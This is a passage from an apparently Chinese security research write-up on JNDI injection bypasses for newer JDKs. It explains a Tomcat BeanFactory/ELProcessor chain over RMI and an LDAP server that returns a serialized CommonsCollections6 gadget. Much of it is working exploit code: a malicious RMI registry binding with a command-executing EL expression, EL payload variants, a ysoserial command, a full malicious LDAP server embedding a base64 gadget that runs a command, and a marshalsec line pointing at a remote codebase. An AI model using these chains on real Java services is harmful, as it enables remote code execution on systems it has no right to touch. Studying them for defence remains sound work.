  9. ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','/System/Applications/Calculator.app/Contents/MacOS/Calculator']).start()\")"));
  10. ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
  11. registry.bind("Exploit", referenceWrapper);
  12. }

}

  1. ##### Client

package org.example;

import javax.naming.InitialContext; import javax.naming.NamingException;

public class Client { public static void main(String[] args) throws NamingException { //初始化环境 InitialContext init = new InitialContext(); // 寻找Exploit,然后会执行EL表达式 init.lookup(“rmi://127.0.0.1:1099/Exploit”); } }

  1. ![image-20210819112253475](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987639872-c7c4c7a1-a63c-4f87-9837-adb972cd711d.png)
  2. #### 几种变体的表达式
  3. 前面的恶意表达式就是通过反射的方式来实现命令执行的,本地测试有如下几种变体,原理都是基于反射调用任意类方法:

import javax.el.ELProcessor;

public class Test { public static void main(String[] args) { String poc = “‘’.getClass().forName(‘javax.script.ScriptEngineManager’)” + “.newInstance().getEngineByName(‘nashorn’)” + “.eval(\”s=[3];s[0]=’cmd’;s[1]=’/C’;s[2]=’calc’;java.lang.Runtime.getRuntime().exec(s);\”)”; // String poc = “‘’.getClass().forName(‘java.lang.Runtime’).getMethod(‘exec’,’’.getClass())” + // “.invoke(‘’.getClass().forName(‘java.lang.Runtime’).getMethod(‘getRuntime’)” + // “.invoke(null),’calc.exe’)}”; // String poc = “‘’.getClass().forName(‘javax.script.ScriptEngineManager’)” + // “.newInstance().getEngineByName(‘JavaScript’)” + // “.eval(\”java.lang.Runtime.getRuntime().exec(‘calc’)\”)”; new ELProcessor().eval(poc); } }

  1. #### Debug分析
  2. 因为`org.apache.naming.factory.BeanFactory` 类在 `getObjectInstance()` 中会通过反射的方式实例化Reference所指向的`任意Bean Class`,并且会调用setter方法为所有的属性赋值。而该Bean Class的类名、属性、属性值,全都来自于Reference对象,均是攻击者可控的。所以重点分析`getObjectInstance()`<br />`RegistryContext.lookup`RMI registry发请求,反序列获取到`ReferenceWrapper_Stub`,然后把反序列得到的`ReferenceWrapper_Stub`传给`decodeObject()`<br />![image-20210819152602319](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987642096-56f105b9-7603-4dd1-b6e9-3013b2ce503b.png)<br />跟进`decodeObject`,首先给获取到的var1 `ReferenceWrapper_Stub`调用`getReference()`方法,`getReference`方法通过获取`ReferenceWrapper_Stub`的`ref`属性然后发请求, 反序列请求结果得到真正绑定到RMI Registry上的对象(`ResourceRef`), 然后传给`NamingManager.getObjectInstance()`方法。<br />![image-20210819152959325](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987644461-66af650a-3933-470f-adeb-b0cc50028e74.png)<br />首先类型转换将object转换为`Reference对象`<br />![image-20210819153423470](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987649968-2cbebe95-fc75-4dcf-924a-8deff489b9b4.png)<br />然后`ref.getFactoryClassName()` 获取`FactoryClassName`,返回的是Reference对象的`classFactory`属性,然后传递到`getObjectFactoryFromReference`中,然后`loadClass`加载我们传入的`org.apache.naming.factory.BeanFactory`类, 再`newInstance`实例化该类并将其转换成`ObjectFactory`类型。<br />![image-20210819160412148](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987652615-3fbeb75d-e269-46fe-a10b-e9645509255b.png)<br />然后直接调用`ObjectFactory接口`实现类实例的`getObjectInstance()`函数,这里是`BeanFactory`类实例的`getObjectInstance()`函数<br />![image-20210819161424244](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987655287-af57e617-11e8-40c6-bcfe-ff09d8ca0a06.png)<br />跟进`BeanFactory.getObjectInstance`,会判断obj参数是否是ResourceRef类实例,是的话代码才会往下走,**这就是为什么我们在恶意RMI服务端中构造Reference类实例的时候必须要用Reference类的子类ResourceRef类来创建实例**<br />![image-20210819161647722](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987658354-1c33af65-7267-4e8c-a71d-e3eff1880ba3.png)<br />接着获取Bean类为`javax.el.ELProcessor`后,实例化该类并获取其中的forceString类型的内容,其值是我们构造的`x=eval`内容:<br />![image-20210819162159006](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987661704-4628588a-5c80-4f4d-bb75-91f3bbca8eb1.png)<br />继续往下调试可以看到,查找forceString的内容中是否存在”=”号,不存在的话就调用属性的默认setter方法,存在的话就取键值、其中键是属性名而对应的值是其指定的setter方法。如此,**之前设置的forceString的值就可以强制将x属性的setter方法转换为调用我们指定的eval()方法了,这是BeanFactory类能进行利用的关键点!**之后,就是获取`beanClass`即`javax.el.ELProcessor`类的`eval()`方法并和x属性一同缓存到forced这个HashMap中<br />![image-20210819162511210](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987665051-f2ba795d-1429-4e46-93ad-14d8fbb47a9c.png)<br />接着是多个`do while`语句来遍历获取`ResourceRef`类实例addr属性的元素,当获取到addrType为x的元素时退出当前所有循环,然后调用`getContent()`函数来获取x属性对应的contents即恶意表达式。这里就是恶意RMI服务端中ResourceRef类实例添加的第二个元素<br />![image-20210819163456939](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987669004-37de4bdf-d048-4d7a-8c5d-4a2a4759cc43.png)<br />获取到类型为x对应的内容为恶意表达式后,从前面的缓存forced中取出key为x的值即`javax.el.ELProcessor`类的`eval()`方法并赋值给method变量,最后就是通过`method.invoke()`即反射调用的来执行恶意的EL表达式。
  3. #### 总结
  4. - 这种方法是从本地ClassPath中寻找可能存在Tomcat相关依赖包来进行触发利用,已知的类是`org.apache.naming.factory.BeanFactory`
  5. - 由于`org.apache.naming.factory.BeanFactory`类的getObjectInstance()方法会判断是否为ResourceRef类实例,因此在RMI服务端绑定的Reference类实例中必须为Reference类的子类ResourceRef类实例,这里resourceClass选择的也是在Tomcat环境中存在的`javax.el.ELProcessor`类;
  6. - ResourceRef类实例分别添加了两次StringRefAddr类实例元素,第一次是类型为`forceString`、内容为`x=eval`StringRefAddr类实例,这里看`org.apache.naming.factory.BeanFactory`类的getObjectInstance()方法源码发现,程序会判断是否存在`=`号,若存在则将`x`属性的默认setter方法设置为我们`eval`;第二次是类型为`x`、内容为恶意表达式的StringRefAddr类实例,这里是跟前面的`x`属性关联起来,`x`属性的setter方法是eval(),而现在它的内容为恶意表达式,这样就能串起来调用`javax.el.ELProcessor`类的eval()函数执行恶意表达式从而达到攻击利用的目的
  7. ### 绕过高版本JDK限制:利用LDAP返回序列化数据,触发本地Gadget
  8. LDAP服务端除了支持JNDI Reference这种利用方式外,还支持直接返回一个序列化的对象。**如果Java对象的`javaSerializedData属性值`不为空,则客户端的`obj.decodeObject()`方法就会对这个字段的内容进行反序列化**。<br />
  9. 如果服务端ClassPath中存在反序列化漏洞多功能利用GadgetCommonsCollections库,那么就可以结合该Gadget实现反序列化漏洞攻击。
  10. #### 利用举例
  11. ##### 生成POC
  12. 假设目标系统中存在着有漏洞的`CommonsCollections`库,使用ysoserial生成一个CommonsCollections的利用Payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 “open -na Calculator” | base64

  1. ##### LDAP Server

package org.example;

import com.unboundid.ldap.listener.InMemoryDirectoryServer; import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; import com.unboundid.ldap.listener.InMemoryListenerConfig; import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; import com.unboundid.ldap.sdk.Entry; import com.unboundid.ldap.sdk.LDAPException; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; import com.unboundid.util.Base64;

import javax.net.ServerSocketFactory; import javax.net.SocketFactory; import javax.net.ssl.SSLSocketFactory; import java.net.InetAddress; import java.net.MalformedURLException; import java.net.URL; import java.text.ParseException;

public class App { private static final String LDAP_BASE = “dc=example,dc=com”;

  1. public static void main (String[] args) {
  2. String url = "http://127.0.0.1:8888/#Exploit";
  3. int port = 1389;
  4. try {
  5. InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
  6. config.setListenerConfigs(new InMemoryListenerConfig(
  7. "listen",
  8. InetAddress.getByName("0.0.0.0"),
  9. port,
  10. ServerSocketFactory.getDefault(),
  11. SocketFactory.getDefault(),
  12. (SSLSocketFactory) SSLSocketFactory.getDefault()));
  13. config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url)));
  14. InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
  15. System.out.println("Listening on 0.0.0.0:" + port);
  16. ds.startListening();
  17. }
  18. catch ( Exception e ) {
  19. e.printStackTrace();
  20. }
  21. }
  22. private static class OperationInterceptor extends InMemoryOperationInterceptor {
  23. private URL codebase;
  24. /**
  25. *
  26. */
  27. public OperationInterceptor ( URL cb ) {
  28. this.codebase = cb;
  29. }
  30. /**
  31. * {@inheritDoc}
  32. *
  33. * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
  34. */
  35. @Override
  36. public void processSearchResult (InMemoryInterceptedSearchResult result ) {
  37. String base = result.getRequest().getBaseDN();
  38. Entry e = new Entry(base);
  39. try {
  40. sendResult(result, base, e);
  41. }
  42. catch ( Exception e1 ) {
  43. e1.printStackTrace();
  44. }
  45. }
  46. protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {
  47. URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
  48. System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
  49. e.addAttribute("javaClassName", "Exploit");
  50. String cbstring = this.codebase.toString();
  51. int refPos = cbstring.indexOf('#');
  52. if ( refPos > 0 ) {
  53. cbstring = cbstring.substring(0, refPos);
  54. }
  55. // Payload1: 利用LDAP+Reference Factory

// e.addAttribute(“javaCodeBase”, cbstring); // e.addAttribute(“objectClass”, “javaNamingReference”); // e.addAttribute(“javaFactory”, this.codebase.getRef());

  1. // Payload2: 返回序列化Gadget
  2. try {
  3. e.addAttribute("javaSerializedData", Base64.decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABNvcGVuIC1uYSBDYWxjdWxhdG9ydAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg="));
  4. } catch (ParseException exception) {
  5. exception.printStackTrace();
  6. }
  7. result.sendSearchEntry(e);
  8. result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
  9. }
  10. }

}

  1. ##### Client

package org.example;

import javax.naming.InitialContext; import javax.naming.NamingException;

public class Client { public static void main(String[] args) throws NamingException { //初始化环境 InitialContext init = new InitialContext(); init.lookup(“ldap://127.0.0.1:1389/Exploit”); } }

  1. ![image-20210819165755303](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987671199-6da0f810-8982-402f-bfbe-433965b00b2f.png)
  2. #### Debug分析
  3. ##### 调用栈
  4. ![image-20210819171135332](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987672711-1699f9a0-8b94-420b-93c7-420ceb667feb.png)<br />前面的函数调用链都是不同类`lookup()`函数之间的调用,`com.sun.jndi.ldap.LdapCtx`类的`c_lookup()`函数中会调用到`com.sun.jndi.ldap.Obj`类的`decodeObject()`函数进行解码对象的操作。<br />跟进去,先调用`getCodebases()`函数从`JAVA_ATTRIBUTES`中取出索引为4即`javaCodeBase`的内容,由于本次并没有设置这个属性因此返回null即下面Variables框中的`var1(slot_2)`变量;然后从`JAVA_ATTRIBUTES`中取出索引为1即`javaSerializedData`的内容,这个我们是在恶意LDAP服务端中设置了的、内容就是恶意的Commons-Collections这个Gadget的恶意利用序列化对象字节流,对应的是下面Variables框中的`var2 (slot_1)`变量;这里`var1(slot_2`)变量为null,传入`getURLClassLoader()`函数调用后返回的是`AppClassLoader`即应用类加载器;再往下就是调用`deserializeObject()`函数来反序列化`javaSerializedData`的对象字节码<br />![image-20210819171349431](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987674592-63cc0207-38f6-4d4e-9877-45a7abe3e813.png)<br />其中,静态变量`JAVA_ATTRIBUTES`的内容如下:<br />![image-20210819171719561](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987679187-963a724b-a61a-4fcb-80ed-8829b1f8c73e.png)
  5. #### 建议
  6. 实战中可以使用marshalsec方便的启动一个LDAP/RMI Ref Server

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer # []

Example:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://8.8.8.8:8090/#Exploit 8088

```

参考